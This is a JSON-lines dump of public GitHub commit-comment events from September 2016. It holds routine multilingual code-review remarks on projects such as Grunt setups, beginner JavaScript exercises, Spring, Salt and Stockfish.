{"id":"4610443695","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"mirekmts/JavaScript"},"payload":{"comment":{"id":19151572,"position":6,"line":6,"path":"instrukcje-warunkowe/js/scripts.js","commit_id":"c45ef2337b3dd3214bd2433d8f245e46e7cac073","created_at":"2016-09-23T19:25:44Z","updated_at":"2016-09-23T19:25:44Z","body":"Dokładnie tak jest,\r\n\r\nMimo tej możliwości, warto używać klamer dla zachowania czytelności kodu.\r\nWarto też dawać spację przed nawiasem otwierającym. Również dla czytelności lecz już z użyciem klamer niektórzy zalecają aby robić linię przerwy wewnątrz bloku.\r\nJednak to już pozostawiam Tobie :)\r\n\r\nPrzykład\r\n```\r\nif (value > 0) {\r\n\r\n  // kod bloku\r\n\r\n} else {\r\n  \r\n  // kod bloku\r\n  \r\n}\r\n```"}},"created_at":"2016-09-23T19:25:44Z"}
{"id":"4610449728","type":"CommitCommentEvent","actor":{"login":"blackcoder87"},"repo":{"name":"IlchCMS/Ilch-2.0"},"payload":{"comment":{"id":19151581,"position":null,"line":null,"path":null,"commit_id":"49724994f9808939dcf5aeb0bf9541b5e03ee5d4","created_at":"2016-09-23T19:27:02Z","updated_at":"2016-09-23T19:27:02Z","body":"Ist hoffentlich hiermit behoben:\r\nhttps://github.com/IlchCMS/Ilch-2.0/pull/270\r\n\r\nDas Updaten für Module wurde schon eingebaut. Es fehlt noch, dass die Updates auch bei den installierten Modulen angezeigt werden, aber das ist schon fast fertig.\r\nhttp://www.ilch.de/forum-showposts-53500-p2.html\r\n\r\nLayout-Update ist auch fertig, wenn wir die config.php der Layouts ähnlich aufbauen wie die von den Modulen. Näheres hatte ich im oben verlinkten Thread geschrieben.\r\n"}},"created_at":"2016-09-23T19:27:02Z"}
{"id":"4610449878","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"gregarndt/servo"},"payload":{"comment":{"id":19151582,"position":null,"line":null,"path":null,"commit_id":"6ad37e10855209a991ea005593704268477d93e6","created_at":"2016-09-23T19:27:04Z","updated_at":"2016-09-23T19:27:04Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XFVReVTxRqarhRs0nOXhog"}},"created_at":"2016-09-23T19:27:04Z"}
{"id":"4610450771","type":"CommitCommentEvent","actor":{"login":"sveisvei"},"repo":{"name":"finn-no/eslint-config-finn"},"payload":{"comment":{"id":19151584,"position":null,"line":null,"path":null,"commit_id":"684c8b52ff4a8da4df3935dd6c6d1519c70fb082","created_at":"2016-09-23T19:27:15Z","updated_at":"2016-09-23T19:27:15Z","body":"👍 "}},"created_at":"2016-09-23T19:27:15Z"}
{"id":"4610452540","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"mirekmts/JavaScript"},"payload":{"comment":{"id":19151591,"position":8,"line":8,"path":"instrukcje-warunkowe/js/scripts.js","commit_id":"c45ef2337b3dd3214bd2433d8f245e46e7cac073","created_at":"2016-09-23T19:27:38Z","updated_at":"2016-09-23T19:27:38Z","body":"Dobrą praktyką jest wykorzystywanie porównania wraz ze sprawdzeniem typu\r\n`value === 0`, ale to też zależy od przypadku. Tutaj byłby wskazany, bo chcemy, aby nasz wynik był liczbą."}},"created_at":"2016-09-23T19:27:38Z"}
{"id":"4610460996","type":"CommitCommentEvent","actor":{"login":"f-knorr"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19151607,"position":21,"line":4897,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"744428449c3e6fdc3fb2e67a045f552de106cc7a","created_at":"2016-09-23T19:29:31Z","updated_at":"2016-09-23T19:29:31Z","body":"done!"}},"created_at":"2016-09-23T19:29:31Z"}
{"id":"4610461534","type":"CommitCommentEvent","actor":{"login":"timehaven"},"repo":{"name":"timehaven/cpcrw"},"payload":{"comment":{"id":19151610,"position":null,"line":null,"path":null,"commit_id":"2a8ec3fb7e2c40888bd9a535c9d23fff5ffb9287","created_at":"2016-09-23T19:29:39Z","updated_at":"2016-09-23T19:29:39Z","body":"The hard coded DESIRED_MET_DTYPES is 6 columns so when your file with 9 columns is read, then ncols = df.shape[1] will be 9 and your [0:ncols] will crash.  I think you just reversed your logic a bit.\r\n\r\nAlso, no need for [0:ncols], simply use [:ncols].\r\n\r\nAnd here you could have something like, using boolean indexing:\r\n\r\n`desired_cols = [9, 6][subdir_date > DATE_OF_CHANGE]`\r\n\r\nbut you have to make sure DESIRED_MET_DTYPES has an additional 3 columns for the [:9] case to work."}},"created_at":"2016-09-23T19:29:39Z"}
{"id":"4610461705","type":"CommitCommentEvent","actor":{"login":"Lunatixz"},"repo":{"name":"im85288/script.tvguide.dvr"},"payload":{"comment":{"id":19151611,"position":null,"line":null,"path":null,"commit_id":"59b54f1bcfc9f28bf71d30f30745a5aa0c65c682","created_at":"2016-09-23T19:29:41Z","updated_at":"2016-09-23T19:29:41Z","body":"Thats some fine looking code you got there... Would have been nice if you mentioned who wrote it... but oh well, copy n paste seems to rule opensource."}},"created_at":"2016-09-23T19:29:41Z"}
{"id":"4610463170","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19151613,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-23T19:30:00Z","updated_at":"2016-09-23T19:30:00Z","body":"In my opinion, \"force\" means \"force\", not \"force unless some minimum amount of time has been reached\". Nowhere is this behavior documented, so doing it your way is just asking for someone to open a bug report down the line. I'm not against reverting that behavior, but this sort of thing needs to be properly documented as well."}},"created_at":"2016-09-23T19:30:00Z"}
{"id":"4610467704","type":"CommitCommentEvent","actor":{"login":"yuanyao1"},"repo":{"name":"yuanyao1/hello-world"},"payload":{"comment":{"id":19151617,"position":null,"line":null,"path":null,"commit_id":"0f52c086e7d7ddef9ee21b92538538445632a33e","created_at":"2016-09-23T19:30:44Z","updated_at":"2016-09-23T19:30:44Z","body":"let's see this comment"}},"created_at":"2016-09-23T19:30:44Z"}
{"id":"4610476060","type":"CommitCommentEvent","actor":{"login":"maksymkovalenko"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19151641,"position":135,"line":404,"path":"spring-web-reactive/src/test/java/org/springframework/web/reactive/result/method/annotation/RequestMappingMessageConversionIntegrationTests.java","commit_id":"48d67a245b0d7742a6a2bf0b5e801c5e00bc91bf","created_at":"2016-09-23T19:32:24Z","updated_at":"2016-09-23T19:32:24Z","body":"Isn't `@ExceptionHandler` for sync methods only? And for async results like `Observable`, is it really applicable?"}},"created_at":"2016-09-23T19:32:24Z"}
{"id":"4610479385","type":"CommitCommentEvent","actor":{"login":"clairefant"},"repo":{"name":"clairefant/hello-world"},"payload":{"comment":{"id":19151650,"position":null,"line":null,"path":null,"commit_id":"8d90dcc1934e75c9264e5f5073bfa4d100969414","created_at":"2016-09-23T19:33:07Z","updated_at":"2016-09-23T19:33:07Z","body":"thinking..."}},"created_at":"2016-09-23T19:33:07Z"}
{"id":"4610480093","type":"CommitCommentEvent","actor":{"login":"cwisecarver"},"repo":{"name":"CenterForOpenScience/osf-models"},"payload":{"comment":{"id":19151653,"position":52,"line":904,"path":"osf_models/models/sanctions.py","commit_id":"f2645987cb778656ad7358b6244d8c173bf374bb","created_at":"2016-09-23T19:33:16Z","updated_at":"2016-09-23T19:33:16Z","body":"@sloria This field doesn't exist on the prior model so the migrations are failing on it. Should it really be here and if so where should it migrate from?"}},"created_at":"2016-09-23T19:33:16Z"}
{"id":"4610483894","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"KarolPop/projects"},"payload":{"comment":{"id":19151665,"position":11,"line":41,"path":"gruntfile.js","commit_id":"43be7fba8841a5b57e72f95bbe02190d3bed7532","created_at":"2016-09-23T19:34:09Z","updated_at":"2016-09-23T19:34:09Z","body":"Nie posiadasz takiego folderu w swoim projekcie. Wskaż na główny katalog.\r\nPo prostu `*.css` `*.html`"}},"created_at":"2016-09-23T19:34:09Z"}
{"id":"4610484231","type":"CommitCommentEvent","actor":{"login":"2int2016"},"repo":{"name":"2int2016/Fentec"},"payload":{"comment":{"id":19151666,"position":4,"line":39,"path":"index.html","commit_id":"519e72110ec5e60e35711393e8099efe291ac536","created_at":"2016-09-23T19:34:13Z","updated_at":"2016-09-23T19:34:13Z","body":"uhuuuu\r\n"}},"created_at":"2016-09-23T19:34:13Z"}
{"id":"4610486476","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"KarolPop/projects"},"payload":{"comment":{"id":19151670,"position":30,"line":59,"path":"gruntfile.js","commit_id":"43be7fba8841a5b57e72f95bbe02190d3bed7532","created_at":"2016-09-23T19:34:40Z","updated_at":"2016-09-23T19:34:40Z","body":"Watch też Ci potrzebny. Dodaj go na koniec"}},"created_at":"2016-09-23T19:34:40Z"}
{"id":"4610487545","type":"CommitCommentEvent","actor":{"login":"h-2-0"},"repo":{"name":"osteenbergen/slackify"},"payload":{"comment":{"id":19151673,"position":null,"line":null,"path":null,"commit_id":"d2dbf34a4558e204db6c45db8bdec88a4484b18e","created_at":"2016-09-23T19:34:53Z","updated_at":"2016-09-23T19:34:53Z","body":"@osteenbergen \r\nThis is very cool! Do you now how can I implement for https://github.com/lins05/slackbot? Thanks!"}},"created_at":"2016-09-23T19:34:53Z"}
{"id":"4610488038","type":"CommitCommentEvent","actor":{"login":"eccwiener"},"repo":{"name":"eccwiener/Elena-C-Wiener-Developer"},"payload":{"comment":{"id":19151675,"position":null,"line":null,"path":null,"commit_id":"306d52cff3c9c09d0029e9f06323b81589c29a35","created_at":"2016-09-23T19:35:00Z","updated_at":"2016-09-23T19:35:00Z","body":"Merged with elena wiener portfolio"}},"created_at":"2016-09-23T19:35:00Z"}
{"id":"4610490172","type":"CommitCommentEvent","actor":{"login":"seanfisher"},"repo":{"name":"JamesNK/Newtonsoft.Json"},"payload":{"comment":{"id":19151682,"position":null,"line":null,"path":null,"commit_id":"ca27a0fc3a4e157d4a584549e2aaa65cfc822f3b","created_at":"2016-09-23T19:35:27Z","updated_at":"2016-09-23T19:35:27Z","body":"@JamesNK Awesome, thanks for fixing this. Any word on timeline for releasing these changes? It looks like you release about every three months, which means there's another one coming soon, hopefully!"}},"created_at":"2016-09-23T19:35:27Z"}
{"id":"4610491377","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"KarolPop/projects"},"payload":{"comment":{"id":19151688,"position":null,"line":null,"path":null,"commit_id":"43be7fba8841a5b57e72f95bbe02190d3bed7532","created_at":"2016-09-23T19:35:43Z","updated_at":"2016-09-23T19:35:43Z","body":"Task w gruncie `sass` powinien wskazywać na Twój plik sass, a nie taki jak był w dokumentacji ;)\r\n`'style.css': 'style.sass' `"}},"created_at":"2016-09-23T19:35:43Z"}
{"id":"4610493153","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"KarolPop/projects"},"payload":{"comment":{"id":19151695,"position":null,"line":null,"path":null,"commit_id":"43be7fba8841a5b57e72f95bbe02190d3bed7532","created_at":"2016-09-23T19:36:06Z","updated_at":"2016-09-23T19:36:06Z","body":"Dodaj folder `images` i jakiś obrazek"}},"created_at":"2016-09-23T19:36:06Z"}
{"id":"4610496504","type":"CommitCommentEvent","actor":{"login":"headius"},"repo":{"name":"bundler/bundler"},"payload":{"comment":{"id":19151705,"position":null,"line":null,"path":null,"commit_id":"04a380fdeb8c4e7f83e0985151b1de291d2c000c","created_at":"2016-09-23T19:36:51Z","updated_at":"2016-09-23T19:36:51Z","body":"https://github.com/bundler/bundler/issues/4984"}},"created_at":"2016-09-23T19:36:51Z"}
{"id":"4610497933","type":"CommitCommentEvent","actor":{"login":"mchandschuh"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":19151711,"position":null,"line":null,"path":null,"commit_id":"3c772f8ec633d98016f6df21cd0c9e61237a6998","created_at":"2016-09-23T19:37:09Z","updated_at":"2016-09-23T19:37:09Z","body":"Be careful about refreshing on the exact frequency of the resolution, unless the refresh is tied to a synchronized timer. Also, it stands to reason that data will be delayed. I do not recommend refreshing more often than a second, but in the minute case we may want to consider every half minute - -  my `$0.02`"}},"created_at":"2016-09-23T19:37:09Z"}
{"id":"4610501702","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19151724,"position":null,"line":null,"path":null,"commit_id":"03fb04c7a0804f20581dea4c71ac1c6a8838d670","created_at":"2016-09-23T19:38:00Z","updated_at":"2016-09-23T19:38:00Z","body":"@AndreyAkinshin what do you think about extending DeclarationsProvider with `string GetIdleMultiActionBody(int factor)` and `string GetMainMultiActionBody(int factor)`\r\n\r\nwhich would do the loop unrolling intead of `Unroll` ?\r\n\r\nonce again I am really impressed by the number of hard issues that you have solved with your recent changes!"}},"created_at":"2016-09-23T19:38:00Z"}
{"id":"4610502425","type":"CommitCommentEvent","actor":{"login":"mchandschuh"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":19151727,"position":null,"line":null,"path":null,"commit_id":"3c772f8ec633d98016f6df21cd0c9e61237a6998","created_at":"2016-09-23T19:38:11Z","updated_at":"2016-09-23T19:38:11Z","body":"Also, with the hourly case, it would be possible that he gets data up to 30 minutes behind. "}},"created_at":"2016-09-23T19:38:11Z"}
{"id":"4610505446","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19151736,"position":null,"line":null,"path":null,"commit_id":"4161d765e899d474fe0972aa80b64b5161f882ad","created_at":"2016-09-23T19:38:52Z","updated_at":"2016-09-23T19:38:52Z","body":"Actualizo a la versión commit \r\nhttps://github.com/DjangoGirls/tutorial/commit/f11f359bd3b1f044f33e5bd77ff796fc17670f7c\r\nteniendo en cuenta el diff:\r\ntutorial/en/django_orm$ git diff f11f359bd3b1f044f33e5bd77ff796fc17670f7c ."}},"created_at":"2016-09-23T19:38:52Z"}
{"id":"4610505994","type":"CommitCommentEvent","actor":{"login":"zsoltibaba37"},"repo":{"name":"zsoltibaba37/allcopy"},"payload":{"comment":{"id":19151741,"position":null,"line":null,"path":null,"commit_id":"5b5b055f94e9c598bf3504e0267257c9e752b36b","created_at":"2016-09-23T19:38:59Z","updated_at":"2016-09-23T19:38:59Z","body":"Copy all file from one location to another location."}},"created_at":"2016-09-23T19:38:59Z"}
{"id":"4610508646","type":"CommitCommentEvent","actor":{"login":"yeputons"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19151749,"position":null,"line":null,"path":null,"commit_id":"6bbc3f22ba4cc660cf76279e038fa484e84e51c7","created_at":"2016-09-23T19:39:36Z","updated_at":"2016-09-23T19:39:36Z","body":"I believe that you did not modify `kRedisServer` in `system_rewrite_options.cc` in this commit :("}},"created_at":"2016-09-23T19:39:36Z"}
{"id":"4610514802","type":"CommitCommentEvent","actor":{"login":"walter"},"repo":{"name":"discourse/discourse_api"},"payload":{"comment":{"id":19151767,"position":null,"line":null,"path":null,"commit_id":"7978d05e8c1819f197559df9e93b81d999425e8d","created_at":"2016-09-23T19:40:58Z","updated_at":"2016-09-23T19:40:58Z","body":"Yo @eric-hu, sorry to add this here, but can you please drop me from circleci/picard-docs. I was mistakenly invited and accepted to get context (only glanced at the README). Does not look like it was intentional invite."}},"created_at":"2016-09-23T19:40:58Z"}
{"id":"4610515360","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"rubybib/rubybib.org"},"payload":{"comment":{"id":19151768,"position":null,"line":null,"path":null,"commit_id":"a2ca6bc2970d33707fdca5f9698d91cbf6e5a877","created_at":"2016-09-23T19:41:06Z","updated_at":"2016-09-23T19:41:06Z","body":"@chrisseaton Thanks!"}},"created_at":"2016-09-23T19:41:06Z"}
{"id":"4610522752","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19151786,"position":null,"line":null,"path":null,"commit_id":"e571fd0e8ee7d755a88fa15c3269202baebbe209","created_at":"2016-09-23T19:42:45Z","updated_at":"2016-09-23T19:42:45Z","body":"Rooks have a RookOnPawn bonus which often kicks in on outposts on rank 5 or 6 such as\r\nWhite Rb5, Black a5 b6 c5\r\n"}},"created_at":"2016-09-23T19:42:45Z"}
{"id":"4610525768","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"mdlugosz1/kodilla-javascript"},"payload":{"comment":{"id":19151800,"position":29,"line":13,"path":"js/scripts.js","commit_id":"6687640768f9cbd01aa70458c35add6659b17cf1","created_at":"2016-09-23T19:43:25Z","updated_at":"2016-09-23T19:43:25Z","body":"To ma się znaleźć wewnątrz ifa.\r\n\r\nBo imiona w tablicy mają być unikalne. To co wewnątrz if-a może się wcale nie wykonać.\r\n\r\nJeśli imienia nie ma w tablicy to ma być wypisane `imie nie znajduje się na tablicy` i zostać dodane.\r\nA jeśli imie jest już w tablicy - push-a ma nie być, bo to imię już jest"}},"created_at":"2016-09-23T19:43:25Z"}
{"id":"4610528589","type":"CommitCommentEvent","actor":{"login":"xXGeorgeGRxx"},"repo":{"name":"xXGeorgeGRxx/TestAPP"},"payload":{"comment":{"id":19151807,"position":5,"line":13,"path":"app/src/main/java/me/thunderstormgr/android/testapp/MainActivity.java","commit_id":"08d80e87d6fa2c5c9f721ef84cfb7cb4771b2c8c","created_at":"2016-09-23T19:44:02Z","updated_at":"2016-09-23T19:44:02Z","body":"Hello, I'm new to Java!\r\nWhat does this line do ?"}},"created_at":"2016-09-23T19:44:02Z"}
{"id":"4610529930","type":"CommitCommentEvent","actor":{"login":"Sniper2k"},"repo":{"name":"Sniper2k/University-Explorer-Project"},"payload":{"comment":{"id":19151816,"position":6,"line":5,"path":"README.md","commit_id":"b7ceaa8fc97bf3b8eafd1129b3343ac5d5ddd19c","created_at":"2016-09-23T19:44:20Z","updated_at":"2016-09-23T19:44:20Z","body":"It creates a tree of directories. Possible two kind of items: directories and \"files\""}},"created_at":"2016-09-23T19:44:20Z"}
{"id":"4610531917","type":"CommitCommentEvent","actor":{"login":"grossmj"},"repo":{"name":"GNS3/gns3-server"},"payload":{"comment":{"id":19151819,"position":6,"line":201,"path":"gns3server/compute/builtin/nodes/cloud.py","commit_id":"2ca8bce6e3194af64d383485b73b6f04b339c39d","created_at":"2016-09-23T19:44:32Z","updated_at":"2016-09-23T19:44:32Z","body":"This will require lib pcap to be installed."}},"created_at":"2016-09-23T19:44:32Z"}
{"id":"4610532354","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"mdlugosz1/kodilla-javascript"},"payload":{"comment":{"id":19151820,"position":20,"line":9,"path":"js/scripts.js","commit_id":"6687640768f9cbd01aa70458c35add6659b17cf1","created_at":"2016-09-23T19:44:38Z","updated_at":"2016-09-23T19:44:38Z","body":"Po ifie ma nie być średnika.\r\nTak wygląda wzór instrukcji warunkowej:\r\n```\r\nif (warunek) {\r\n  // kod w ifie\r\n} else {\r\n  // kod w else\r\n}\r\n```"}},"created_at":"2016-09-23T19:44:38Z"}
{"id":"4610533947","type":"CommitCommentEvent","actor":{"login":"xXGeorgeGRxx"},"repo":{"name":"xXGeorgeGRxx/TestAPP"},"payload":{"comment":{"id":19151824,"position":5,"line":13,"path":"app/src/main/java/me/thunderstormgr/android/testapp/MainActivity.java","commit_id":"08d80e87d6fa2c5c9f721ef84cfb7cb4771b2c8c","created_at":"2016-09-23T19:45:00Z","updated_at":"2016-09-23T19:45:00Z","body":"This line prints in the Console, if available (may not in Android) the String/Text \"Hi\""}},"created_at":"2016-09-23T19:45:00Z"}
{"id":"4610535204","type":"CommitCommentEvent","actor":{"login":"sirlatrom"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":19151828,"position":205,"line":277,"path":"components/camel-salesforce/camel-salesforce-component/src/main/java/org/apache/camel/component/salesforce/internal/streaming/SubscriptionHelper.java","commit_id":"7d97e5b5800969b74e805e66a94a6c5323bfeafc","created_at":"2016-09-23T19:45:17Z","updated_at":"2016-09-23T19:45:17Z","body":"I'm seeing different behaviour, but it could be due to many others interfering elements such as our corporate proxy server. I'll see if I can attach a full debug log when I return to work on Monday.\r\n\r\nI have yet too understand many if the involved components, but by the CometD connect failure retries, do you mean a built-in feature in the CometD client, or some code here in `SubscriptionHelper`? I haven't seen any debug log statements from the client mentioning retries when messages to /meta/connect get unsuccessful responses..."}},"created_at":"2016-09-23T19:45:17Z"}
{"id":"4610537087","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"mdlugosz1/kodilla-javascript"},"payload":{"comment":{"id":19151834,"position":31,"line":15,"path":"js/scripts.js","commit_id":"6687640768f9cbd01aa70458c35add6659b17cf1","created_at":"2016-09-23T19:45:43Z","updated_at":"2016-09-23T19:45:43Z","body":"Aby wyświetlić ilość imion, możesz wypisać właściwość `length` tj. `moreNames.length`"}},"created_at":"2016-09-23T19:45:43Z"}
{"id":"4610539309","type":"CommitCommentEvent","actor":{"login":"airborn"},"repo":{"name":"jvm-bloggers/jvm-bloggers"},"payload":{"comment":{"id":19151841,"position":5,"line":7,"path":"src/main/java/com/jvm_bloggers/TimeConstants.java","commit_id":"d5e7a5790afaaf1f13429452e32bd41724237b6e","created_at":"2016-09-23T19:46:12Z","updated_at":"2016-09-23T19:46:12Z","body":"Ignore this, it will be no loner valid after #258 "}},"created_at":"2016-09-23T19:46:12Z"}
{"id":"4610540704","type":"CommitCommentEvent","actor":{"login":"inikolov89"},"repo":{"name":"inikolov89/pebble-routines"},"payload":{"comment":{"id":19151847,"position":null,"line":null,"path":null,"commit_id":"dd4e273253e8446fed6e48f0f95b90b2ba40da75","created_at":"2016-09-23T19:46:31Z","updated_at":"2016-09-23T19:46:31Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [load data from local storage](https://trello.com/c/mIEHcvQk/10-load-data-from-local-storage)"}},"created_at":"2016-09-23T19:46:31Z"}
{"id":"4610541824","type":"CommitCommentEvent","actor":{"login":"Ayuto"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19151849,"position":null,"line":null,"path":null,"commit_id":"69319d2d0c0319d9ab61c81c7713eebf9d5e9f97","created_at":"2016-09-23T19:46:47Z","updated_at":"2016-09-23T19:46:47Z","body":"Now, you can simply do this:\r\n```python\r\nfrom players.entity import Player\r\n\r\nplayer = Player(1)\r\nplayer.give_named_item('weapon_awp')\r\n```"}},"created_at":"2016-09-23T19:46:47Z"}
{"id":"4610543285","type":"CommitCommentEvent","actor":{"login":"DSuds"},"repo":{"name":"afragen/github-updater"},"payload":{"comment":{"id":19151855,"position":null,"line":null,"path":null,"commit_id":"1b422c1f4f5309ec83183a8ea90f80ab9d1dad85","created_at":"2016-09-23T19:47:08Z","updated_at":"2016-09-23T19:47:08Z","body":"I just manually patched this on the release version 5.6.1 and it seems to have cleared it up."}},"created_at":"2016-09-23T19:47:08Z"}
{"id":"4610556290","type":"CommitCommentEvent","actor":{"login":"manzarek123"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19151891,"position":null,"line":null,"path":null,"commit_id":"10fdf160d694b10cfe74f6a6c2b1c8c7b0326f20","created_at":"2016-09-23T19:50:01Z","updated_at":"2016-09-23T19:50:01Z","body":"And still no lured pokemon.\r\nIs this project dead?\r\n\r\nIs there an active fork of this?"}},"created_at":"2016-09-23T19:50:01Z"}
{"id":"4610556818","type":"CommitCommentEvent","actor":{"login":"seamusabshere"},"repo":{"name":"devTristan/srvr"},"payload":{"comment":{"id":19151894,"position":null,"line":null,"path":null,"commit_id":"382464c75e9515afb41f67cffb97108c32593ee5","created_at":"2016-09-23T19:50:08Z","updated_at":"2016-09-23T19:50:08Z","body":"![quote](http://static4.quoteswave.com/wp-content/uploads/2013/04/The-paranoid-is-never.jpg?03d4a8)"}},"created_at":"2016-09-23T19:50:08Z"}
{"id":"4610556976","type":"CommitCommentEvent","actor":{"login":"THEMVFFINMAN"},"repo":{"name":"THEMVFFINMAN/Python-Games"},"payload":{"comment":{"id":19151895,"position":null,"line":null,"path":null,"commit_id":"6c8bf30279720349314ca75ce7a7b6c47712afc7","created_at":"2016-09-23T19:50:10Z","updated_at":"2016-09-23T19:50:10Z","body":"Only detects future walls with the user driver, still need to correct it so that the ai can use it against other ai. The whole point of the project is to make it, to a degree, as expandable as possible. But right now I'm getting pigeonholed into a 1 user vs 1 ai mindset that I'll have to fix. I think I'll work on it only after I'm satisfied with the AI because that is really the difficult part"}},"created_at":"2016-09-23T19:50:10Z"}
{"id":"4610558061","type":"CommitCommentEvent","actor":{"login":"desalesouche"},"repo":{"name":"FireLord1/android_kernel_motorola_msm8916"},"payload":{"comment":{"id":19151899,"position":null,"line":null,"path":null,"commit_id":"5aa37656e1a26748fade2e2071d7b45396f621c0","created_at":"2016-09-23T19:50:24Z","updated_at":"2016-09-23T19:50:24Z","body":"these 2 files are not compiled... not enabled in make file nor kconfig...."}},"created_at":"2016-09-23T19:50:24Z"}
{"id":"4610558753","type":"CommitCommentEvent","actor":{"login":"Mtpty"},"repo":{"name":"Mtpty/next-repo"},"payload":{"comment":{"id":19151905,"position":null,"line":null,"path":null,"commit_id":"770197ba8cdec66bc9f53130c4e06178e5ed1e20","created_at":"2016-09-23T19:50:32Z","updated_at":"2016-09-23T19:50:32Z","body":"asd"}},"created_at":"2016-09-23T19:50:32Z"}
{"id":"4610560128","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19151912,"position":18,"line":38,"path":"gruntfile.js","commit_id":"747d607d9fed3fd62fd9b2e1c48459d523352db6","created_at":"2016-09-23T19:50:50Z","updated_at":"2016-09-23T19:50:50Z","body":"W browserSync musisz wskazać kiedy ma się on restartować.\r\nMa reagować na zmiany w konkretnych plikach, a ty musisz mu powiedzieć które to pliki.\r\n\r\nPoza tym musisz dodać `watchTask: tue`, aby działał on prawidłowo z watch-em\r\n\r\nNapisz ten config jeszcze raz, zgodnie z tym linkiem `https://www.browsersync.io/docs/grunt#grunt-watch`"}},"created_at":"2016-09-23T19:50:50Z"}
{"id":"4610561867","type":"CommitCommentEvent","actor":{"login":"felixheidecke"},"repo":{"name":"felixheidecke/core"},"payload":{"comment":{"id":19151915,"position":null,"line":null,"path":null,"commit_id":"e4c21eef7bcb24a83ff8fb6fbcb99d9c54b50711","created_at":"2016-09-23T19:51:13Z","updated_at":"2016-09-23T19:51:13Z","body":"Would it eventually violate the copyright, if we just replaced the current hard-coded year with `date('Y')` instead?"}},"created_at":"2016-09-23T19:51:13Z"}
{"id":"4610562139","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19151918,"position":48,"line":65,"path":"gruntfile.js","commit_id":"747d607d9fed3fd62fd9b2e1c48459d523352db6","created_at":"2016-09-23T19:51:17Z","updated_at":"2016-09-23T19:51:17Z","body":"Kolejność tasków jest teraz prawidłowa 👍 "}},"created_at":"2016-09-23T19:51:17Z"}
{"id":"4610566242","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"gregarndt/servo"},"payload":{"comment":{"id":19151930,"position":null,"line":null,"path":null,"commit_id":"dc4a1c5479ec228d4d25503d65ead181e1a72985","created_at":"2016-09-23T19:52:11Z","updated_at":"2016-09-23T19:52:11Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WaoFLBpHTmeAeVwcWnPLTQ"}},"created_at":"2016-09-23T19:52:11Z"}
{"id":"4610571601","type":"CommitCommentEvent","actor":{"login":"Gustavo131997"},"repo":{"name":"Fabian-Code/Proyecto_de_Programacion"},"payload":{"comment":{"id":19151945,"position":null,"line":null,"path":null,"commit_id":"aa41ca2fe3bb56e2c7fd99dd333e15e9e52dcca5","created_at":"2016-09-23T19:53:21Z","updated_at":"2016-09-23T19:53:21Z","body":"Hola"}},"created_at":"2016-09-23T19:53:21Z"}
{"id":"4610572560","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19151948,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-23T19:53:35Z","updated_at":"2016-09-23T19:53:35Z","body":"https://youtu.be/T76lywnwMnc"}},"created_at":"2016-09-23T19:53:35Z"}
{"id":"4610575066","type":"CommitCommentEvent","actor":{"login":"azul"},"repo":{"name":"leapcode/leap_web"},"payload":{"comment":{"id":19151959,"position":null,"line":null,"path":null,"commit_id":"4a73c2ca2938ae748588d7ca72a785af99724c92","created_at":"2016-09-23T19:54:06Z","updated_at":"2016-09-23T19:54:06Z","body":"@lilaluca no. This is for including a customized message per provider such as \"This is a demo provider - all data can be erased at any time\".\r\nWe used to add this by overwriting the entire content partial. But that means the providers don't get any twitter feed.\r\nThe twitter feed still is below this and should not be affected by this change."}},"created_at":"2016-09-23T19:54:06Z"}
